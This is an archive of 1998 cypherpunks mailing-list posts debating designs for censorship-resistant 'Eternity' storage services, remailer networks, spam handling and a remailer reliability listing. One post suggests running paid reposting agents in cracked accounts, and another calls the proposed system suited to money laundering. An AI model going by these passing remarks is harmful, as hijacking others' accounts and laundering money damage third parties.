> - no known publicized nexus (less bait for lawyers,  prosecutors, etc.)

This one is crucial.

> - changeable nodes, again, a la remailers
>
> - smaller and cheaper nodes, rather than expensive workstation-class nodes
> 
> - CD-ROMS made of Eternity files and then sold or distributed widely

This is an interesting suggestion, but surely would open the
distributor up for liability, especially if copyright software were
amongst the documents.  Were you thinking of 

> - purely cyberspatial locations, with no know nexus
>
> (I point to my own "BlackNet" experiment as one approach.)

This is the best option.  Make it entirely distributed, so there is no
nexus, period.  cyberspacial -> meatspace mappings are often easier to
trace than we would wish, especially where there is continued usage
(for example there are various active attacks which can make progress
even against mixmaster remailers).  This is the weak point of my
reposting agent, be that human, or automated.

However anonymous interchangeable reposting agents is an interesting
concept.  One way to view the reposting function would be to view it
as a new function for remailers; that they would post a message a
specified number of times at specified intervals.

However it is probably better to separate the function into a separate
agent because remailers are known, and few in number.  A reposting
agent need never advertise an address.  Instructions to the agent
would be via USENET (it would read news for instructions and eternity
documents bundled with ecash payment for it's services, and repost
these according to those instructions).  The reposting agents would be
motivated by profit, have reasonable chances at obscuring their
identity through the use of remailers, and so would be willing to take
the risks.  A smart operator could further reduce risks by using
resources intermittently and unpredictably, and by using multiple,
automated entry nodes into the remailer net.

Potentially agents could be left operating in cracked accounts,
siphoning payments off to their owners, at fairly low risk to the
owner.

Agents could be rated for reliability in delivering services paid for,
or payment could be enabled for each repost by a arbitration agent
upon seeing the post.

> It is also likely in the extreme that a working Eternity service will
> quickly be hit with attackers of various sorts who want to test the limits
> of the service, or who want such services shut down. 

I agree with this prediction.  Remailers have seen this pattern, with
`baiting' of operators, and apparently people posting controversial
materials and reporting the materials to the SPA or others themselves,
etc.

As you might guess part of the above are unimplemented.  The local
proxy is my current task.  Reposting agents are unimplemented, as is
integration of payment.


Another comment is that reader anonymity is a separable aim which
should be cleanly separated from the design.  Services like
anonymizer, crowds, pipenets, SSL encrypted news server access
(supported by netscape 4), and local news feed can ensure anonymous
access to eternity document space at varying cost trade-offs.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 12 Jan 1998 12:36:43 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: (eternity) mailing list and activity
In-Reply-To: <199801112144.VAA00285@server.eternity.org>
Message-ID: <199801120432.XAA12666@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Adam Back writes:

> Firstly note that there are 3 (three) systems going by the name of
> eternity service at present.  

I've heard that there are perhaps as many as two more which are vaguely
non-public, as well.

> And there is Ryan Lackey's Eternity DDS (where DDS stands for I
> presume Distributed Data Store?).  I am not sure of the details of his
> design beyond that he is building a market for CPU and disk space, and
> building on top of a an existing database to create a distributed data
> base accessible as a virtual web space (amongst other `views').  He
> gave this URL in his post earlier today:
> 
> 	http://sof.mit.edu/eternity/

I'm only using an existing database for reasons of expediency in prototyping.
The actual production system will include no commercial code.  Oracle is
a bloated pig for this kind of thing, too.  One of the 'views' for the
data will be a virtual database.

> [description of how to commit data in Adam Back's Eternity Service implementation elided]

My current design will require some kind of interface between users and 
eternityspace
in order to commit data.  Since the pricing/specification/etc. system will be
rather sophisticated, I'm also working on a simulation tool to assist users in
committing data.  However, it will be possible in my ideal implementation for 
a user
to fill out a form with duration of storage required, 
bandwidth/accessibility/uptime
requirements, a pro-rated schedule for nonperformance, amount of space needed, 
amount
of computation needed, etc. and attach their object.  Then, there will be a 
market
based system which lets people bid on storing that data -- various indices of 
prices
will exist (although since it is multiaxis, they will have to be surfaces, 
with a large
amount of interpolation).  Someone will buy it, perhaps resell in a recursive
auction market, etc.  There will be a designated verifier which will make sure 
the
contract is met, using a variety of mechanisms designed to preserve anonymity 
and
prevent fraud, and enforce the contract.  Payment will be held in escrow, 
disbursed at
pre-specified intervals, again totally anonymously.

Since these contracts are negotiable, there should be a market in 
selling/trading/etc.
old Eternity contracts.  As the realities of storing data change, the market 
will take
this into account, and up or down value existing and new contracts.

Potentially, one could even use Eternity storage as a kind of currency.  The 
system would
seem to be purpose-built for money laundering, once it is big enough that
all money going into or out of the system is not monitorable (a threshold which
depends on the design of the system and payment scheme as well).


I think I'm going to take a break from my demo writing to work on some public 
documents.
Some parts of my current system are total mock-ups, others don't yet exist.  
My "two-way
anonymous e-cash implementation" is a chit file in /tmp on my machine (heh), 
and
putting data into the system requires serious frobbing.  And Oracle is 
handling most of
the coherency/etc. issues right now.
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNLmcw6wefxtEUY69AQH+tgf8Ctsg6UJbGzDhzeXwNKYB6qI+afTnKWkw
sYgyRf/tKEual6yaXymiCBswUzfW39jdqkQ313DPlGQzovCq6AcsXQyhk5H93h+e
V5aI2belCUEUFxJ21WUj++ZtM5vSh0lcFAlz/w3ejuju7Il27uW8vDVfHjOBg65m
oO6F7Wi4Wp2V4B4720KieHLhs9Rg9YGNVsDZPSgfY5KFpcDylpEARW6ipCceBQu+
fLrT+or4T3KVSKR7hSPMxULw/FKarMAz+xpyBXFt8UQMEU0azBVhPU3Ui5VPUZ+o
mVMBiZKDFU4dvQCNygcGtebQ1JUFy3YKq48SuTYBr4FPyYNWMgGCSQ==
=oRpR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 12 Jan 1998 13:34:43 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Eternity Services
In-Reply-To: <v03102801b0df03d95cd4@[207.167.93.63]>
Message-ID: <199801120523.AAA12947@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> At 3:06 PM -0800 1/11/98, Adam Back wrote:

> News spool services are already showing signs of getting into this "Usenet
> censorship" business in a bigger way. Some news spool services honor
> cancellations (and some don't).  Some don't carry the "sensitive"
> newsgroups. And so on. Nothing in their setup really exempts them from
> child porn prosecutions--no more so than a bookstore or video store is
> exempted, as the various busts of bookstores and whatnot show, including
> the "Tin Drum" video rental case in Oklahoma City.

There is no market-based reason for a general-purpose news server to store a 
file once it is known it is illegal or even offensive and someone puts any 
serious
amount of pressure on them.  You end up needing to steganographically protect
your data in the usenet stream, yet then you have to resort to security through
obscurity, which royally sucks if you have published source :)  You could use
some kind of cryptographically steganographically protected data, such that
you need a secret key to know stegoed data exists, but then knowing which 
files to
extract becomes a pain -- your server needs to try to extract on *everything*. 
 True,
this also solves part of the TA problem (while making the other parts far 
worse) :)

But it really hammers the servers, and makes it unlikely they'll continue to 
let you access
them.  You could then foil this by using a bunch of tentacles to pull in data, 
but this
increases complexity and security vulnerability.  
> 
> 
> >The solution I am using is to keep reposting articles via remailers.
> >Have agents which you pay to repost.  This presents the illusion of
> 
> This of course doesn't scale at all well. It is semi-OK for a tiny, sparse
> set of reposted items, but fails utterly for larger database sets. (If and
> when Adam's reposted volumes begin to get significant, he will be viewed as
> a spammer. :-) )

Yes.  This (and the URN issue) was one of the initial reasons why I doubted the
functionality of his Eternity implementation if it ever became popular.  One 
of MIT's
news admins was actually vehemently opposed to this "abuse of usenet", and 
implied he
would go out of his way to not carry such articles.

E-DDS should scale well because everyone involved is trying to make a profit.
> 
> >> - CD-ROMS made of Eternity files and then sold or distributed widely
> >
> >This is an interesting suggestion, but surely would open the
> >distributor up for liability, especially if copyright software were
> >amongst the documents.  Were you thinking of
> >
> 
> The CD-ROM distribution is just a side aspect, to get some set of data
> widely dispersed. For example, if the data base is of "abortion" or
> "euthanasia" information (a la Hemlock Society), which various parties want
> suppressed, then handing out freebie CD-ROMs is one step.
> 
> Many examples of this: Samizdats in Russia, crypto/PGP diskettes handed out
> at conferences (was Ray Arachelian doing this several years ago?), and
> various religious and social tracts. Obviously, this is what broadsheets
> and fliers are designed to do. Self-publishing in general.
> 
> If the intent is to collect money for the data base accesses, then of
> course other considerations come into play.
> 
> (Critical to these "Eternity" things is a good model of the customers, the
> reasons for the data, etc.)

My implementation allows flexibility -- someone pays for every scarce 
resource, yes, but
it does not have to always be the same person.  There will hopefully evolve to 
be people
willing to speculate in data, storing it for free in exchange for a cut, 
others willing
to pay the cost of putting their own data up and making access free up to a 
certain point,
etc.

I like CD-ROM distribution.  My discman carried munitions, as well as music, 
recently,
on the same disc.
> 
> (* I say "working" in the sense that the concept was very easy to
> demonstrate just by using PGP and remailers. Not much more than what I
> demonstrated in 1993 would be needed to deploy a real system. Except for
> one thing: true digital cash. Not the bullshit one-way-traceable stuff that
> Chaum and others are now pushing, but the original, online-cleared or
> escrow-cleared form, a la the work of Goldberg et. al. For some of these
> applications, below, simple token- or coupon-based schemes might work
> adequately.)

There are currently-under-development systems which will meet the digital cash 
requirement,
from people who I consider highly respectable and competent.

Yes, blacknet is a perfect model of a distributed high-latency system.  
However,
to get a system which will actually be useful to end users requires quite a 
bit more than
just storing data -- services like reporting on the reliability of data, 
allowing
easy access to data by third parties, etc. are all pretty essential.  
Cypherpunks
may find blacknet highly useful, but most end users want something that works
like the web, or like a database, which is the primary advantage of the current
"Eternity" systems.
> 
> How these models will work using existing infrastructure (Usenet,
> remailers, Web proxies, etc.) depends on some factors. It might be useful
> to consider some benchmark applications, such as:
> 
> 1. Anonymous purchase of financially important data. (A good example being
> the Arbitron ratings for radio markets...subscription to Arbitron is quite
> expensive, and posting of results on Usenet is prosecuted by Arbitron. A
> good example of a BlackNet market.)
> 
> 2. Anonymous purchase of long articles, e.g., encycopedia results...
> 
> (I'm not sure there's still a market for this....)
> 
> 3. Anonymous purchase of "term papers." (A thriving market for ghostwritten
> articles...already migrating to the Web, but lacking adequate anonymizing
> methods.)
> 
> This is an example of a very large data base (all term papers on file)
> which cannot possibly by distributed feasibly by Usenet.
> 
> And so on...lots of various examples.
> 
> The whole Eternity thing is interesting, but we haven't made a lot of
> progress, it seems to me. (I distributed a proposal a bit similar to what
> Ross Anderson was proposing, a proposal more oriented toward making a
> _persistent_ Web URL for academics and lawyers to reliably cite, with less
> of the "404--File Not Found" sorts of messages, the things which make the
> Web largely unusable for academic and scientific citations.)

Yes, having a persistent URN is highly useful.  Adam's implementation kind of 
solves
this, and I have not yet come up with a solution to it -- it would be easy to
do a pretty simple persistent URL, but having something which would allow
indexing to be something other than a web-search-engine style kludge is more 
difficult.
I've been reading some papers on the topic.
> 
> 
> >> It is also likely in the extreme that a working Eternity service will
> >> quickly be hit with attackers of various sorts who want to test the limits
> >> of the service, or who want such services shut down.
> >
> >I agree with this prediction.  Remailers have seen this pattern, with
> >`baiting' of operators, and apparently people posting controversial
> >materials and reporting the materials to the SPA or others themselves,
> >etc.
> 
> Yep, it's hard to disagree with this. Any centralized "Eternity service"
> will be hit with various kinds of attacks in quick order.
> 
> Building a data base, as Ryan comments seem to indicate he is mostly
> interested in doing, is the least of the concerns.

I think perhaps this is inaccurate.  I am interested in being able to subsume 
the
functionality of a database for some applications, but I'm trying to build 
something
more like a distributed active agents system.  A database implies a single 
central
design -- this would be more a medium in which people could place databases, 
agents, etc.
> 
> --Tim May
> 
> The Feds have shown their hand: they want a ban on domestic cryptography
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^2,976,221   | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 

-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Mon, 12 Jan 1998 08:44:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Spam
Message-ID: <3092d7f2431e74ea40b5d0ad22244ca3@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



Matthew L Bennett <lord_buttmonkey@juno.com> wrote:

>>I'm hoping you guys would know where I could find out
>>more about this individual -- I'm hoping that he does
>>in fact buy his service from someone else, and if so,
>>I'm not sure how to find that out.  If he doesn't, is
>>there anything I can do?
>  ^^^^^^^^^^^^^^^^^^^^^^^^^
>
>Yeah, there is.
>
>Delete the friggin e-mail like a sensible person.
>
>I get a lot of spam every day, but I just delete it and go on with my
>life.

Since even many of the major sites these days seem to be run by a bunch of
idiots who don't care that they destroy the network so long as they make a
buck. 

1) Trash mail from throwaway account providers like Juno (which I notice
you're using), Hotmail, AOL, Prodigy, MSN, and anybody who offers something
like a "fifty hours free spamming" policy.
2) Trash mail from chronic problem sites like AGIS, Earthlink, Worldnet, and
their ilk.
3) If you get a flame for a civilized spam complaint (zippo.com did this to
me) trash the mail from the site on the grounds that they're idiots.
4) If you get an incredibly stupid set of responses like I got from IBM
today kill mail from them on the grounds that they have no idea what they're
doing.
5) If it comes in with an obviously forged address then trash it. This has
the possibly beneficial side effect of killing mail from "legitimate" users
who purposefully use invalid addresses.
6) If it uses a relay site in one domain but comes from another trash it. A
good example would be spam mail which is relayed off of someplace.com.au but
has a "From" header which points to someplace.edu.tw, and has some other
received lines which point to a dialup at MCI.
7) If it overuses punctuation in the subject line such as "!!!!!" then trash
it.
8) If it comes in with a bunch of bogus IP addresses in the header then
trash it.
9) If it's in HTML then trash it.
10) If it has lines over 80 characters nuke it.
11) If it comes in more than twice nuke it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 12 Jan 1998 13:55:17 +0800
To: Tim May <tcmay@got.net>
Subject: Re: (eternity) Re: Eternity Services
In-Reply-To: <v03102806b0df4ce0852e@[207.167.93.63]>
Message-ID: <199801120549.AAA13206@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


> 
> My comments below are not meant to cast doubt on Ryan Lackey's scheme, but
> just to raise some questions.
> 
> I am surprised, I have to admit, that Ryan is talking so much about raising
> money, getting investors, etc., when no _working model_ of his scheme has
> been deployed for people to play with, find weaknesses in, etc.

No working model has been deployed by me as of yet.  However, most of the
components are "solved problems", with existing working models.  Worst case,
it would be possible to accomplish equivalent functionality by linking
these by remailers and hoping no one shuts down the remailers.
> 
> (In comparison to, say, remailers, which have existed for more than five
> years now, with literally thousands of articles--some good, some
> bad--written about them in all of their various facets. Even specialized
> lists for remailer operators, Mixmaster-type remailers, etc. And yet there
> have been no serious calls for investors to pour money in.)

I believe no one has seriously called to pour money into remailers because 
there
is no money to be made from them, and making them commercial exposes them to
additional pressure and liability, not because they are technically poorly 
designed.
> 
> Frankly, in reading Ryan's summary, including assertions like "In my
> system, no one knows (ideally) who is actually storing the data, only those
> on the edges of the system (who will hopefully only be known by a logical
> address)," I find no real discussion of the *core idea*, the _reason_ his
> data base is in fact secure.

It's not a database.  A technical design document describing it, security
assumptions made, and implementation guidelines has been under development.  I 
have
been working on small demonstration components only in order to test ideas -- I
have identified technical problems which are essential to an Eternity 
implementation, and I have been looking into literature for solutions.  In
some areas, no good solutions exist in research, so I've been trying to
find technical solutions.
> 
> (I apologize if a full discussion is contained in his earlier documents.
> Even if his earlier documents had a fuller description, there has certainly
> been an almost complete lack of discussion of his system here in
> Cypherpunks. Given the additional complexitities an Eternity type data base
> has over something as conceptually simple as a remailer, the lack of
> discussion is not confidence-inspiring that Ryan somehow got it all
> right.....)

A full discussion is included in a document which has not yet been released.  
It's
not finished, even in draft form.  Classes and leaving the country to talk to 
people
and work on a side project got in the way of finishing it.  Once a draft is 
done,
I'm planning to release it to a small set of people, get their comments, then
finish the demo and send it to the cypherpunks community, with a pointer to the
demo.  I do not want to release a half-finished draft for fear that then 
progress will
slow to a standstill on the unfinished parts.

> 
> Anyway, I can think of all sort of threat models, and ways of (maybe)
> attacking any system of linked machines I can think of, except ones using
> message pools (which is why I'm biased in favor of Blacknet, I suppose).
> 
> (The motivation for Blacknet was to a) demonstrate message pools, b) show
> that anyone could be a node, c) build a system where the links between
> nodes are all of the traffic in "speech space," and that so long as
> encrypted messages could be posted in speech space (Usenet, boards, etc.),
> then the system could not be shut down. Basically, to stop Blacknet one
> would have to ban remailers in all jurisdictions, or ban speech coming from
> certain jurisdictions. Otherwise, it's too distributed to stop.)

I don't believe in the protection of being in "speech space" vs. being
in network space as substantially different.  Extralegal means will be
used to shut down servers in either case, if it is sufficiently important
to the attackers.
> 
> (Note: But Blacknet has long latency, derived from its "speech"
> underpinnings. There is the temptation to go to faster links, to move away
> from speech space into traditional network links. But this reduces the
> number of nodes and links, and makes an attack on the reduced-but-faster
> network no longer equivalent to interfering with free speech. A
> technological win but a political lose.)

It does not necessarily reduce the number of nodes and links (it may for
a given amount of traffic).
> 
> Until we see a mathematical model--forget the details of implementation,
> the epiphenomenal stuff about Oracle, AOLServer, Alphas, and K6s!--of how N
> distributed nodes store incoming files in such a way that the goals of
> Eternity can be satisfied...
>
Yes, a mathematical and technical model is critical.  However, certain
technical questions not directly related to security are easiest to solve by
experiment.
 
> (And we need to discuss in more detail just what the goals can
> realistically, and economically, be.)
>
Yes, this is true.  I've prepared a list of goals and assumptions -- I will
post them at some point in the near future.  Debate over them would be more
fruitful than any technical debate at this point.
 
> There are a bunch of issues which come up, motivated by Ryan's comments
> that he already has the design of a file system in mind:
> 
> - why won't all machines in the network in Country A simply be shut down,
> regardless of whether the Authorities can prove which machine in particular
> is storing the banned material?

If every single machine in country A is shut down, then Eternity access to that
country fails.  This is why it is essential that all machines involved
in the network retain anonymity, both from users and from untrusted other
nodes.  Several methods exist for this, including a cellular structure, 
anonymous
writing by using remailers or other technical means, etc.
>> 
> - given the problems remailer networks have to deal with, with traffic
> analysis and correlation analysis (an area we have alluded to but not done
> serious work on), why would not the same methods be applicable to tracking
> movements through the system Ryan is apparently proposing?

Components of the system will take their own security into account when pricing
service.  It won't necessarily be linear.  Since they have their own security 
in
mind, they will not willingly send a file which will lead to their demise 
unless
the reward for doing so is higher than the penalties of being caught.
> 
> (I believe a 20 MB child porn video MPEG sent into the Eternity network
> would leave "footprints" an analyst or watcher could track. I am willing to
> be show the error of my ways, but only with some calculations of diffusion
> entropy, for example.)

> 
> - In short, I want to see some simple descriptions of WHAT IS GOING ON.

I agree.
> 
> It has always been very easy for us to describe how networks of remailers
> work--so simple that at the very first Cypherpunks meeting in '92 we played
> the "crypto anarchy game" with envelope-based remailers, message pools,
> digital cash, escrow, etc. (Running this simulation took several hours, but
> taught us a lot.)


> 
> I'd like to know how Eternity DDS _works_. Then we can start mounting
> attacks on it: spoofing attacks, denial of service attacks, and attacks
> assuming various levels of observability into the network linking the nodes.

That's the primary reason for having both a design document and a demo.  People
can read about how it should work, and attack it at that level, as well as look
at it in operation.
> 
> Until then, I think it's a waste of time and money to be coding a detailed
> implementation of a protocol.

True.  I'm not coding a detailed implementation of a protocol, I'm doing a 
bunch
of minor experiments to see what technical means are feasible, as well as
trying to create something which lets people see how it works.
> 
> (And it may _still_ be a waste of money, even after the protocol is beat
> upon thoroughly. There is no clear market for such a service, and not even
> for remailers. And maybe not even for PGP, in terms of paying customers
> sufficient to pay the bills. Not to criticize PGP, just noting the obvious,
> the same obvious situation that seems to be the case with digital cash.
> Great idea, but where are the customers?)

That's why I'm trying to design the service with security *and* commercial 
usability
in mind.  I believe there are plenty of commercial uses for something with the
right combination.  If something like Eternity DDS exists which is 
indistinguishable to
the user from a web server, and from those adding files from a system superior 
to a web
server (such as a database), yet provides the level of security which I hope 
to provide,
I think there will be a commercial market.

So, I guess in order of priority:
1) list of goals and assumptions for a commercially-viable eternity service,
with cypherpunks-level security, made available for discussion
2) technical design document to meet these goals circulated among
some subset of the community for initial sanity checking
3) functional demo prepared which can demonstrate the feasibility of the system
4) release of 2) and 3) to cypherpunks, eternity, etc. for commentary
5) repeat 2, 3, 4 as necessary
6) production implementation

I've been working on 1, 2, and 3 in parallel but with roughly correct 
distribution
of effort.
> 
> Thanks,
> 
> 
> The Feds have shown their hand: they want a ban on domestic cryptography
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^2,976,221   | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 

- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNLmuyqwefxtEUY69AQE/iwf6As+DXq0Q+XfaIfvfYX0VKJFhvvBigLWB
6ShAOEIzA2jOSGmzmdVWYfHw2Lan5wRcj0VyCMCJo+YYGfxf62z3clPut2Qm2ABv
j7xzD6oGVwpf0ESzo7ZlsBL57dyhQiX8EjJQD5RQJBPS5/+wvjw0GsmKb3Tw6042
3/T4aVol2x339XtIG+rck7XV6H6kFZeKE8dbfopH9C/7b26d9fbI8JDxFaaqi+Q/
ccPXL+dB3QRHls8rR4BqPwPQ+Z//Ui4j4V2dhHgWyfIHxcnYReh0vPlN8os3rIHw
2dFra1YLXZ50NVEV6GGPnOzwBqn+zqPVQaXBnyrWAClCCRz0JMITBw==
=TE1C
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Mon, 12 Jan 1998 14:03:56 +0800
To: cypherpunks@Algebra.COM
Subject: Privacy Software FTP site
In-Reply-To: <v03102804b0df1be302d4@[207.167.93.63]>
Message-ID: <3.0.3.32.19980112005829.0348b7a0@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



The Georgia Cracker remailer (@anon.efga.org) sent out a total of

     20,997 anonymous messages last week

FTP STATISTICS FOR PRIVACY FILES 

Electronic Frontiers Georgia's FTP site allows authors of selected software
to have a no cost, high bandwidth distribution site for their files. We are
not the authors of such software, nor have we tested the software. Please
use at your own risk. These files can be found at ftp.efga.org/privacy/ 

Statistics are for the week ended Saturday, Midnight EST, before Mon Jan 12
00:37:49 EST 1998 

10 files uploaded
261 files downloaded

27 Private Idaho 32
22 pi32exe.exe
13 QdPGP Plug in for Pegasus
11 Jack B. Nymble, large file
18 JBN file 1 of 5
25 JBN file 2 of 5
21 JBN file 3 of 5
25 JBN file 4 of 5
26 JBN file 5 of 5
3 JBN upgrade
9 Potato 2.20
1 Decrypt
7 Freedom Remailer
0 'C' MemLock utility for PGP

About our FTP site

EFGA maintains a high bandwidth, low volume FTP site. Our servers are
located about 15 feet from a well managed network of high bandwidth fiber
connections to multiple backbones. We are capable of peak speeds of 10MB,
or about six times the speed of a T1. If you are the author of software
that supports EFGA causes such as Free Speech, anti-censorship, privacy, or
cryptography and would like for us to host your software, please contact us
for more information. 

These statistics are located at http://anon.efga.org/privacy/ftpstats.phtml 


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Jan 1998 15:42:07 +0800
To: cypherpunks@toad.com
Subject: Re: Congratulations!
In-Reply-To: <Pine.BSF.3.91.980111055520.4763D-100000@mcfeely.bsfs.org>
Message-ID: <8yL7ie2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Rabid Wombat <wombat@mcfeely.bsfs.org> writes:

> p.s. - Thanks for the little white pills, Dr. Vulis. I'm feeling much
> happier now.

You are very welcome.

On the subject of junk e-mail: I've made an effort to place myself and
certain other addresses on the spammers' removal lists. This may be why
I get a lot less junk e-mail that apparently most people who post to
Usenet.

These days, I get about 2 or 3 junk e-mails; they are usually sent from
ibm.net or worldcom.att.net or erathlink or netcom; never aol or juno
(although they may be forged to look this way). I typically forward them
with the headers and without any comments to abuse@originating ISP, and
am typically notified within a day that the account has been terminated.

(Unlike the assholes from news.admin.net-abuse.* I have better things to
do than to keep track of my kill count, but it must be close to a hundred
since I started doing this last summer.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Mon, 12 Jan 1998 16:50:22 +0800
To: cypherpunks@Algebra.COM
Subject: Re: (eternity) mailing list and activity
In-Reply-To: <34B9327A.2AAEEF87@ix.netcom.com>
Message-ID: <3.0.3.32.19980112033654.03388468@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 05:52 AM 1/12/98 GMT, phelix@vallnet.com wrote:
>What prevents the operator of such a server from being charged with
>"conspiracy to provide child porn" or whatever?  If he is holding a portion
>of such contraband, isn't he as liable as if he was holding the whole
>article(s)?

In the US, the remaining provisions of the CDA would shield an ISP from
prosecution concerning child porn.  In fact most everything but
intellectual property cases, which may be shielded by other means.  If the
eternity server acts merely as a pipeline, without the operators
participating or encouraging illegal activities, then there is a good
chance that the eternity server could be treated as a service provider in
the same fashion and be immune from prosecution directly.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Mon, 12 Jan 1998 14:03:54 +0800
To: cypherpunks@Algebra.COM
Subject: Re: (eternity) mailing list and activity
In-Reply-To: <34B9327A.2AAEEF87@ix.netcom.com>
Message-ID: <34b9a145.15127288@128.2.84.191>
MIME-Version: 1.0
Content-Type: text/plain



On 11 Jan 1998 18:48:24 -0600, Adam Back <aba@dcs.ex.ac.uk> wrote:

>Wei Dai suggested that documents should be secret split in a redundant
>fashion so that say 2 of 5 shares are required to reconstruct the
>document.  If the shares are distributed across different servers,
>this ensures that one server does not directly hold the information.

What prevents the operator of such a server from being charged with
"conspiracy to provide child porn" or whatever?  If he is holding a portion
of such contraband, isn't he as liable as if he was holding the whole
article(s)?

-- Phelix





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 12 Jan 1998 23:20:48 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199801121450.GAA17730@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = "<remailer@anon.efga.org> cpunk mix remix pgp hash ksub esub latent cut ek reord post";
$remailer{'redneck'} = '<config@anon.efga.org> newnym pgp';
$remailer{"bureau42"} = "<remailer@bureau42.ml.org> cpunk mix pgp ksub hash latent cut ek";
$remailer{"neva"} = "<remailer@neva.org> cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = "<mix@anon.lcs.mit.edu> mix";
$remailer{"medusa"} = "<medusa@weasel.owl.de> mix middle"
$remailer{"McCain"} = "<mccain@notatla.demon.co.uk> mix middle";
$remailer{"valdeez"} = "<valdeez@juno.com> cpunk pgp pgponly hash ek";
$remailer{"arrid"} = "<arrid@juno.com> cpunk pgp pgponly hash ek";
$remailer{"hera"} = "<goddesshera@juno.com> cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = "<h_tuttle@rigel.cyberpass.net> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
